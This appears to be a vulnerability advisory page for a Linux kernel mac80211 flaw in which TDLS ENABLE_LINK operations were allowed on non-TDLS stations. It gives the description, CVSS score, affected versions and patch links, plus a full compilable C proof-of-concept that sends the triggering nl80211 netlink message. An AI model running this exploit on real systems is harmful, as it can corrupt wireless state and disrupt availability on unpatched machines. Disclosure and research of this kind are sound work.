Security Vulnerability Report
CVE-2026-43052 CVSS 7.1 HIGH


Published: 2026-05-01 15:16:52
Last Modified: 2026-05-07 18:19:17
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

wifi: mac80211: check tdls flag in ieee80211_tdls_oper

When NL80211_TDLS_ENABLE_LINK is called, the code only checks if the station exists but not whether it is actually a TDLS station. This allows the operation to proceed for non-TDLS stations, causing unintended side effects like modifying channel context and HT protection before failing.

Add a check for sta->sta.tdls early in the ENABLE_LINK case, before any side effects occur, to ensure the operation is only allowed for actual TDLS peers.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 3.2, before 6.12.81) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 6.13, before 6.18.22) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 6.19, before 6.19.12) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:7.0:rc3:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:7.0:rc4:*:*:*:*:*:* - VULNERABLE
Linux Kernel (versions before the fix patch was applied)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
C
/*
 * PoC for CVE-2026-43052
 * Sends an NL80211_CMD_TDLS_OPER request with NL80211_TDLS_ENABLE_LINK for a
 * station that is not a TDLS peer, reaching the code path in
 * ieee80211_tdls_oper that lacked the sta->sta.tdls check.
 * Compile with: gcc -o poc_tdls poc_tdls.c -lnl-3 -lnl-genl-3
 */
#include <netlink/netlink.h>
#include <netlink/genl/genl.h>
#include <netlink/genl/ctrl.h>
#include <linux/nl80211.h>
#include <net/if.h>      /* if_nametoindex() */
#include <stdio.h>
#include <string.h>
#include <unistd.h>

int main(int argc, char **argv)
{
    struct nl_sock *sock;
    struct nl_msg *msg;
    int family_id;
    const char *iface = "wlan0"; /* Change to your wireless interface */
    int ifindex;
    /* Target station MAC (e.g. the AP MAC). Dummy value; replace for testing */
    unsigned char mac[6] = {0x00, 0x11, 0x22, 0x33, 0x44, 0x55};

    /* 1. Allocate and connect Netlink socket */
    sock = nl_socket_alloc();
    if (!sock) {
        perror("nl_socket_alloc");
        return -1;
    }
    if (genl_connect(sock)) {
        perror("genl_connect");
        goto err_out;
    }

    /* 2. Resolve nl80211 generic netlink family */
    family_id = genl_ctrl_resolve(sock, "nl80211");
    if (family_id < 0) {
        fprintf(stderr, "nl80211 not found\n");
        goto err_out;
    }
    ifindex = if_nametoindex(iface);
    if (ifindex == 0) {
        perror("if_nametoindex");
        goto err_out;
    }

    /* 3. Construct the Netlink message */
    msg = nlmsg_alloc();
    if (!msg) {
        perror("nlmsg_alloc");
        goto err_out;
    }
    /* NL80211_CMD_TDLS_OPER */
    genlmsg_put(msg, NL_AUTO_PID, NL_AUTO_SEQ, family_id, 0, 0,
                NL80211_CMD_TDLS_OPER, 0);
    /* NL80211_ATTR_IFINDEX */
    nla_put_u32(msg, NL80211_ATTR_IFINDEX, ifindex);
    /* NL80211_ATTR_MAC (target station MAC) */
    nla_put(msg, NL80211_ATTR_MAC, 6, mac);
    /* NL80211_ATTR_TDLS_OPERATION: NL80211_TDLS_ENABLE_LINK
     * This triggers the vulnerable code path on a non-TDLS station */
    nla_put_u32(msg, NL80211_ATTR_TDLS_OPERATION, NL80211_TDLS_ENABLE_LINK);

    /* 4. Send the message */
    printf("Sending malicious TDLS_ENABLE_LINK operation to non-TDLS station...\n");
    nl_send_auto(sock, msg);
    nlmsg_free(msg);

err_out:
    nl_socket_free(sock);
    return 0;
}

References

https://git.kernel.org/stable/c/7d73872d949c488a1d7c308031d6a9d89b5e0a8b (Patch)
https://git.kernel.org/stable/c/8148c2fda4ebb17104a573649c9b699208ad10ee (Patch)
https://git.kernel.org/stable/c/be81f17151fcb8546a95f35ca8f4231b065985de (Patch)
https://git.kernel.org/stable/c/e77b2937aaa20264e4bd699d3244bdb50e7e3343 (Patch)
Raw JSON Data
